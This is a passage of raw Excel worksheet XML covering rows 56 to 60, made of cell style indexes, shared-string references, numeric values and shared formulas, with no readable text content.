      <c r="BR56" s="83"/>
      <c r="BS56" s="83"/>
      <c r="BT56" s="83"/>
      <c r="BU56" s="83"/>
      <c r="BV56" s="83"/>
      <c r="BW56" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX56" s="85" t="s">
        <v>670</v>
      </c>
      <c r="BY56" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ56" s="85">
        <v>2.0</v>
      </c>
      <c r="CA56" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB56" s="85" t="s">
        <v>671</v>
      </c>
      <c r="CC56" s="85"/>
      <c r="CD56" s="85"/>
      <c r="CE56" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF56" s="85"/>
      <c r="CG56" s="85"/>
      <c r="CH56" s="85"/>
      <c r="CI56" s="85"/>
      <c r="CJ56" s="86"/>
      <c r="CK56" s="86"/>
      <c r="CL56" s="86"/>
      <c r="CM56" s="86">
        <v>1.0</v>
      </c>
      <c r="CN56" s="86"/>
      <c r="CO56" s="86"/>
      <c r="CP56" s="86"/>
      <c r="CQ56" s="86"/>
      <c r="CR56" s="86"/>
      <c r="CS56" s="86"/>
      <c r="CT56" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU56" s="88" t="s">
        <v>672</v>
      </c>
      <c r="CV56" s="88">
        <v>4.0</v>
      </c>
      <c r="CW56" s="88">
        <v>6.0</v>
      </c>
      <c r="CX56" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY56" s="88" t="s">
        <v>673</v>
      </c>
      <c r="CZ56" s="88"/>
      <c r="DA56" s="88"/>
      <c r="DB56" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC56" s="88"/>
      <c r="DD56" s="88"/>
      <c r="DE56" s="88"/>
      <c r="DF56" s="88"/>
      <c r="DG56" s="89"/>
      <c r="DH56" s="89"/>
      <c r="DI56" s="89"/>
      <c r="DJ56" s="89">
        <v>1.0</v>
      </c>
      <c r="DK56" s="89"/>
      <c r="DL56" s="89"/>
      <c r="DM56" s="89"/>
      <c r="DN56" s="89"/>
      <c r="DO56" s="89"/>
      <c r="DP56" s="89"/>
      <c r="DQ56" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR56" s="91"/>
      <c r="DS56" s="92">
        <v>15621.0</v>
      </c>
      <c r="DT56" s="93">
        <v>1.0</v>
      </c>
      <c r="DU56" s="93">
        <v>1.0</v>
      </c>
      <c r="DV56" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW56" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX56" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY56" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ56" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA56" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB56" s="74">
        <v>11.0</v>
      </c>
      <c r="EC56" s="74">
        <v>1.0</v>
      </c>
      <c r="ED56" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE56" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="57" ht="153.75" customHeight="1">
      <c r="B57" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C57" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D57" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E57" s="72" t="s">
        <v>674</v>
      </c>
      <c r="F57" s="72" t="s">
        <v>675</v>
      </c>
      <c r="G57" s="97" t="s">
        <v>676</v>
      </c>
      <c r="H57" s="72" t="s">
        <v>677</v>
      </c>
      <c r="I57" s="73" t="s">
        <v>678</v>
      </c>
      <c r="J57" s="73" t="s">
        <v>441</v>
      </c>
      <c r="K57" s="73" t="s">
        <v>679</v>
      </c>
      <c r="L57" s="74">
        <v>340.0</v>
      </c>
      <c r="M57" s="74">
        <v>150.0</v>
      </c>
      <c r="N57" s="74">
        <v>150.0</v>
      </c>
      <c r="O57" s="74">
        <f t="shared" si="1"/>
        <v>150</v>
      </c>
      <c r="P57" s="74">
        <v>150.0</v>
      </c>
      <c r="Q57" s="74">
        <v>0.0</v>
      </c>
      <c r="R57" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S57" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T57" s="76" t="s">
        <v>680</v>
      </c>
      <c r="U57" s="77" t="s">
        <v>681</v>
      </c>
      <c r="V57" s="76" t="s">
        <v>682</v>
      </c>
      <c r="W57" s="76" t="s">
        <v>683</v>
      </c>
      <c r="X57" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y57" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z57" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA57" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB57" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC57" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD57" s="78">
        <v>40063.0</v>
      </c>
      <c r="AE57" s="78">
        <v>1.0</v>
      </c>
      <c r="AF57" s="78">
        <v>92.0</v>
      </c>
      <c r="AG57" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH57" s="78">
        <v>40063.0</v>
      </c>
      <c r="AI57" s="78"/>
      <c r="AJ57" s="78"/>
      <c r="AK57" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL57" s="78"/>
      <c r="AM57" s="78"/>
      <c r="AN57" s="78"/>
      <c r="AO57" s="78"/>
      <c r="AP57" s="80"/>
      <c r="AQ57" s="80"/>
      <c r="AR57" s="80"/>
      <c r="AS57" s="80">
        <v>0.0</v>
      </c>
      <c r="AT57" s="80"/>
      <c r="AU57" s="80"/>
      <c r="AV57" s="80"/>
      <c r="AW57" s="80"/>
      <c r="AX57" s="80"/>
      <c r="AY57" s="80"/>
      <c r="AZ57" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA57" s="82" t="s">
        <v>684</v>
      </c>
      <c r="BB57" s="82">
        <v>2.0</v>
      </c>
      <c r="BC57" s="82">
        <v>93.0</v>
      </c>
      <c r="BD57" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE57" s="82" t="s">
        <v>684</v>
      </c>
      <c r="BF57" s="82"/>
      <c r="BG57" s="82"/>
      <c r="BH57" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI57" s="82"/>
      <c r="BJ57" s="82"/>
      <c r="BK57" s="82"/>
      <c r="BL57" s="82"/>
      <c r="BM57" s="83"/>
      <c r="BN57" s="83"/>
      <c r="BO57" s="83"/>
      <c r="BP57" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ57" s="83"/>
      <c r="BR57" s="83"/>
      <c r="BS57" s="83"/>
      <c r="BT57" s="83"/>
      <c r="BU57" s="83"/>
      <c r="BV57" s="83"/>
      <c r="BW57" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX57" s="85" t="s">
        <v>684</v>
      </c>
      <c r="BY57" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ57" s="85">
        <v>185.0</v>
      </c>
      <c r="CA57" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB57" s="85" t="s">
        <v>684</v>
      </c>
      <c r="CC57" s="85"/>
      <c r="CD57" s="85"/>
      <c r="CE57" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF57" s="85"/>
      <c r="CG57" s="85"/>
      <c r="CH57" s="85"/>
      <c r="CI57" s="85"/>
      <c r="CJ57" s="86"/>
      <c r="CK57" s="86"/>
      <c r="CL57" s="86"/>
      <c r="CM57" s="86">
        <v>0.0</v>
      </c>
      <c r="CN57" s="86"/>
      <c r="CO57" s="86"/>
      <c r="CP57" s="86"/>
      <c r="CQ57" s="86"/>
      <c r="CR57" s="86"/>
      <c r="CS57" s="86"/>
      <c r="CT57" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU57" s="88" t="s">
        <v>685</v>
      </c>
      <c r="CV57" s="88">
        <v>4.0</v>
      </c>
      <c r="CW57" s="88">
        <v>193.0</v>
      </c>
      <c r="CX57" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY57" s="88" t="s">
        <v>686</v>
      </c>
      <c r="CZ57" s="88"/>
      <c r="DA57" s="88"/>
      <c r="DB57" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC57" s="88"/>
      <c r="DD57" s="88"/>
      <c r="DE57" s="88"/>
      <c r="DF57" s="88"/>
      <c r="DG57" s="89"/>
      <c r="DH57" s="89"/>
      <c r="DI57" s="89"/>
      <c r="DJ57" s="89">
        <v>0.0</v>
      </c>
      <c r="DK57" s="89"/>
      <c r="DL57" s="89"/>
      <c r="DM57" s="89"/>
      <c r="DN57" s="89"/>
      <c r="DO57" s="89"/>
      <c r="DP57" s="89"/>
      <c r="DQ57" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR57" s="91"/>
      <c r="DS57" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT57" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU57" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA57" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB57" s="74">
        <v>300.0</v>
      </c>
      <c r="EC57" s="74">
        <v>0.0</v>
      </c>
      <c r="ED57" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE57" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="58" ht="163.5" customHeight="1">
      <c r="B58" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C58" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D58" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E58" s="72" t="s">
        <v>674</v>
      </c>
      <c r="F58" s="72" t="s">
        <v>675</v>
      </c>
      <c r="G58" s="97" t="s">
        <v>687</v>
      </c>
      <c r="H58" s="72" t="s">
        <v>688</v>
      </c>
      <c r="I58" s="73" t="s">
        <v>689</v>
      </c>
      <c r="J58" s="73" t="s">
        <v>690</v>
      </c>
      <c r="K58" s="73" t="s">
        <v>691</v>
      </c>
      <c r="L58" s="74">
        <v>2.0</v>
      </c>
      <c r="M58" s="74">
        <v>1.0</v>
      </c>
      <c r="N58" s="74">
        <v>1.0</v>
      </c>
      <c r="O58" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P58" s="74">
        <v>1.0</v>
      </c>
      <c r="Q58" s="74">
        <v>0.0</v>
      </c>
      <c r="R58" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S58" s="76" t="s">
        <v>554</v>
      </c>
      <c r="T58" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U58" s="77" t="s">
        <v>692</v>
      </c>
      <c r="V58" s="76" t="s">
        <v>693</v>
      </c>
      <c r="W58" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X58" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y58" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z58" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA58" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB58" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC58" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD58" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE58" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF58" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG58" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH58" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI58" s="78"/>
      <c r="AJ58" s="78"/>
      <c r="AK58" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL58" s="78"/>
      <c r="AM58" s="78"/>
      <c r="AN58" s="78"/>
      <c r="AO58" s="78"/>
      <c r="AP58" s="80"/>
      <c r="AQ58" s="80"/>
      <c r="AR58" s="80"/>
      <c r="AS58" s="80">
        <v>0.0</v>
      </c>
      <c r="AT58" s="80"/>
      <c r="AU58" s="80"/>
      <c r="AV58" s="80"/>
      <c r="AW58" s="80"/>
      <c r="AX58" s="80"/>
      <c r="AY58" s="80"/>
      <c r="AZ58" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA58" s="82">
        <v>2100366.0</v>
      </c>
      <c r="BB58" s="82">
        <v>1.0</v>
      </c>
      <c r="BC58" s="82">
        <v>42.0</v>
      </c>
      <c r="BD58" s="79">
        <v>210366.0</v>
      </c>
      <c r="BE58" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF58" s="82"/>
      <c r="BG58" s="82"/>
      <c r="BH58" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI58" s="82"/>
      <c r="BJ58" s="82"/>
      <c r="BK58" s="82"/>
      <c r="BL58" s="82"/>
      <c r="BM58" s="83"/>
      <c r="BN58" s="83"/>
      <c r="BO58" s="83"/>
      <c r="BP58" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ58" s="83"/>
      <c r="BR58" s="83"/>
      <c r="BS58" s="83"/>
      <c r="BT58" s="83"/>
      <c r="BU58" s="83"/>
      <c r="BV58" s="83"/>
      <c r="BW58" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX58" s="85">
        <v>2100366.0</v>
      </c>
      <c r="BY58" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ58" s="85">
        <v>42.0</v>
      </c>
      <c r="CA58" s="79">
        <v>2100366.0</v>
      </c>
      <c r="CB58" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC58" s="85"/>
      <c r="CD58" s="85"/>
      <c r="CE58" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF58" s="85"/>
      <c r="CG58" s="85"/>
      <c r="CH58" s="85"/>
      <c r="CI58" s="85"/>
      <c r="CJ58" s="86"/>
      <c r="CK58" s="86"/>
      <c r="CL58" s="86"/>
      <c r="CM58" s="86">
        <v>0.0</v>
      </c>
      <c r="CN58" s="86"/>
      <c r="CO58" s="86"/>
      <c r="CP58" s="86"/>
      <c r="CQ58" s="86"/>
      <c r="CR58" s="86"/>
      <c r="CS58" s="86"/>
      <c r="CT58" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU58" s="88" t="s">
        <v>694</v>
      </c>
      <c r="CV58" s="88">
        <v>6.0</v>
      </c>
      <c r="CW58" s="88">
        <v>125.0</v>
      </c>
      <c r="CX58" s="79" t="s">
        <v>695</v>
      </c>
      <c r="CY58" s="88" t="s">
        <v>696</v>
      </c>
      <c r="CZ58" s="88"/>
      <c r="DA58" s="88"/>
      <c r="DB58" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC58" s="88"/>
      <c r="DD58" s="88"/>
      <c r="DE58" s="88"/>
      <c r="DF58" s="88"/>
      <c r="DG58" s="89"/>
      <c r="DH58" s="89"/>
      <c r="DI58" s="89"/>
      <c r="DJ58" s="89">
        <v>0.0</v>
      </c>
      <c r="DK58" s="89"/>
      <c r="DL58" s="89"/>
      <c r="DM58" s="89"/>
      <c r="DN58" s="89"/>
      <c r="DO58" s="89"/>
      <c r="DP58" s="89"/>
      <c r="DQ58" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR58" s="91"/>
      <c r="DS58" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT58" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU58" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA58" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB58" s="74">
        <v>2.0</v>
      </c>
      <c r="EC58" s="74">
        <v>0.0</v>
      </c>
      <c r="ED58" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE58" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="59" ht="153.75" customHeight="1">
      <c r="B59" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C59" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D59" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E59" s="72" t="s">
        <v>674</v>
      </c>
      <c r="F59" s="72" t="s">
        <v>675</v>
      </c>
      <c r="G59" s="97" t="s">
        <v>697</v>
      </c>
      <c r="H59" s="72" t="s">
        <v>698</v>
      </c>
      <c r="I59" s="73" t="s">
        <v>699</v>
      </c>
      <c r="J59" s="73" t="s">
        <v>700</v>
      </c>
      <c r="K59" s="73" t="s">
        <v>701</v>
      </c>
      <c r="L59" s="74">
        <v>3.0</v>
      </c>
      <c r="M59" s="74">
        <v>1.0</v>
      </c>
      <c r="N59" s="74">
        <v>1.0</v>
      </c>
      <c r="O59" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P59" s="74">
        <v>1.0</v>
      </c>
      <c r="Q59" s="74">
        <v>0.0</v>
      </c>
      <c r="R59" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S59" s="76" t="s">
        <v>702</v>
      </c>
      <c r="T59" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U59" s="77" t="s">
        <v>703</v>
      </c>
      <c r="V59" s="76" t="s">
        <v>704</v>
      </c>
      <c r="W59" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X59" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y59" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z59" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA59" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB59" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC59" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD59" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE59" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF59" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG59" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH59" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI59" s="78"/>
      <c r="AJ59" s="78"/>
      <c r="AK59" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL59" s="78"/>
      <c r="AM59" s="78"/>
      <c r="AN59" s="78"/>
      <c r="AO59" s="78"/>
      <c r="AP59" s="80"/>
      <c r="AQ59" s="80"/>
      <c r="AR59" s="80"/>
      <c r="AS59" s="80">
        <v>0.0</v>
      </c>
      <c r="AT59" s="80"/>
      <c r="AU59" s="80"/>
      <c r="AV59" s="80"/>
      <c r="AW59" s="80"/>
      <c r="AX59" s="80"/>
      <c r="AY59" s="80"/>
      <c r="AZ59" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA59" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB59" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC59" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD59" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE59" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF59" s="82"/>
      <c r="BG59" s="82"/>
      <c r="BH59" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI59" s="82"/>
      <c r="BJ59" s="82"/>
      <c r="BK59" s="82"/>
      <c r="BL59" s="82"/>
      <c r="BM59" s="83"/>
      <c r="BN59" s="83"/>
      <c r="BO59" s="83"/>
      <c r="BP59" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ59" s="83"/>
      <c r="BR59" s="83"/>
      <c r="BS59" s="83"/>
      <c r="BT59" s="83"/>
      <c r="BU59" s="83"/>
      <c r="BV59" s="83"/>
      <c r="BW59" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX59" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY59" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ59" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA59" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB59" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC59" s="85"/>
      <c r="CD59" s="85"/>
      <c r="CE59" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF59" s="85"/>
      <c r="CG59" s="85"/>
      <c r="CH59" s="85"/>
      <c r="CI59" s="85"/>
      <c r="CJ59" s="86"/>
      <c r="CK59" s="86"/>
      <c r="CL59" s="86"/>
      <c r="CM59" s="86">
        <v>0.0</v>
      </c>
      <c r="CN59" s="86"/>
      <c r="CO59" s="86"/>
      <c r="CP59" s="86"/>
      <c r="CQ59" s="86"/>
      <c r="CR59" s="86"/>
      <c r="CS59" s="86"/>
      <c r="CT59" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU59" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV59" s="88">
        <v>2.0</v>
      </c>
      <c r="CW59" s="88">
        <v>4.0</v>
      </c>
      <c r="CX59" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY59" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ59" s="88"/>
      <c r="DA59" s="88"/>
      <c r="DB59" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC59" s="88"/>
      <c r="DD59" s="88"/>
      <c r="DE59" s="88"/>
      <c r="DF59" s="88"/>
      <c r="DG59" s="89"/>
      <c r="DH59" s="89"/>
      <c r="DI59" s="89"/>
      <c r="DJ59" s="89">
        <v>0.0</v>
      </c>
      <c r="DK59" s="89"/>
      <c r="DL59" s="89"/>
      <c r="DM59" s="89"/>
      <c r="DN59" s="89"/>
      <c r="DO59" s="89"/>
      <c r="DP59" s="89"/>
      <c r="DQ59" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR59" s="91"/>
      <c r="DS59" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT59" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU59" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB59" s="74">
        <v>3.0</v>
      </c>
      <c r="EC59" s="74">
        <v>0.0</v>
      </c>
      <c r="ED59" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE59" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="60" ht="153.75" customHeight="1">
      <c r="B60" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C60" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D60" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E60" s="72" t="s">
        <v>674</v>
      </c>
      <c r="F60" s="72" t="s">
        <v>675</v>
      </c>
      <c r="G60" s="97" t="s">
        <v>676</v>
      </c>
      <c r="H60" s="72" t="s">
        <v>677</v>
      </c>
      <c r="I60" s="73" t="s">
        <v>705</v>
      </c>
      <c r="J60" s="73" t="s">
        <v>706</v>
      </c>
      <c r="K60" s="73" t="s">
        <v>707</v>
      </c>
      <c r="L60" s="74">
        <v>2332.0</v>
      </c>
      <c r="M60" s="74">
        <v>1.0</v>
      </c>
      <c r="N60" s="74">
        <v>1.0</v>
      </c>
      <c r="O60" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P60" s="74">
        <v>1.0</v>
      </c>
      <c r="Q60" s="74">
        <v>0.0</v>
      </c>
      <c r="R60" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S60" s="76" t="s">
        <v>708</v>
      </c>
      <c r="T60" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U60" s="77" t="s">
        <v>709</v>
      </c>
      <c r="V60" s="76" t="s">
        <v>710</v>
      </c>
      <c r="W60" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X60" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y60" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z60" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA60" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB60" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC60" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD60" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE60" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF60" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG60" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH60" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI60" s="78"/>
      <c r="AJ60" s="78"/>
      <c r="AK60" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL60" s="78"/>
      <c r="AM60" s="78"/>
      <c r="AN60" s="78"/>
      <c r="AO60" s="78"/>
      <c r="AP60" s="80"/>
      <c r="AQ60" s="80"/>
      <c r="AR60" s="80"/>
      <c r="AS60" s="80">
        <v>0.0</v>
      </c>
      <c r="AT60" s="80"/>
      <c r="AU60" s="80"/>
      <c r="AV60" s="80"/>
      <c r="AW60" s="80"/>
      <c r="AX60" s="80"/>
      <c r="AY60" s="80"/>
      <c r="AZ60" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA60" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB60" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC60" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD60" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE60" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF60" s="82"/>
      <c r="BG60" s="82"/>
      <c r="BH60" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI60" s="82"/>
      <c r="BJ60" s="82"/>
      <c r="BK60" s="82"/>
      <c r="BL60" s="82"/>
      <c r="BM60" s="83"/>
      <c r="BN60" s="83"/>
      <c r="BO60" s="83"/>
      <c r="BP60" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ60" s="83"/>
      <c r="BR60" s="83"/>
      <c r="BS60" s="83"/>
      <c r="BT60" s="83"/>
      <c r="BU60" s="83"/>
      <c r="BV60" s="83"/>
      <c r="BW60" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX60" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY60" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ60" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA60" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB60" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC60" s="85"/>
      <c r="CD60" s="85"/>
      <c r="CE60" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF60" s="85"/>
      <c r="CG60" s="85"/>
      <c r="CH60" s="85"/>
      <c r="CI60" s="85"/>
      <c r="CJ60" s="86"/>
      <c r="CK60" s="86"/>
      <c r="CL60" s="86"/>
      <c r="CM60" s="86">
        <v>0.0</v>
      </c>
      <c r="CN60" s="86"/>
      <c r="CO60" s="86"/>
      <c r="CP60" s="86"/>
      <c r="CQ60" s="86"/>
      <c r="CR60" s="86"/>
      <c r="CS60" s="86"/>
      <c r="CT60" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU60" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV60" s="88">
        <v>2.0</v>
      </c>
      <c r="CW60" s="88">
        <v>10.0</v>
      </c>
      <c r="CX60" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY60" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ60" s="88"/>
      <c r="DA60" s="88"/>
      <c r="DB60" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC60" s="88"/>
      <c r="DD60" s="88"/>
      <c r="DE60" s="88"/>
      <c r="DF60" s="88"/>
      <c r="DG60" s="89"/>
      <c r="DH60" s="89"/>
      <c r="DI60" s="89"/>
      <c r="DJ60" s="89">
        <v>0.0</v>
      </c>
      <c r="DK60" s="89"/>
      <c r="DL60" s="89"/>
      <c r="DM60" s="89"/>
      <c r="DN60" s="89"/>
      <c r="DO60" s="89"/>
      <c r="DP60" s="89"/>
      <c r="DQ60" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR60" s="91"/>
      <c r="DS60" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT60" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU60" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV60" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW60" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX60" s="94" t="s">
        <v>12</v>
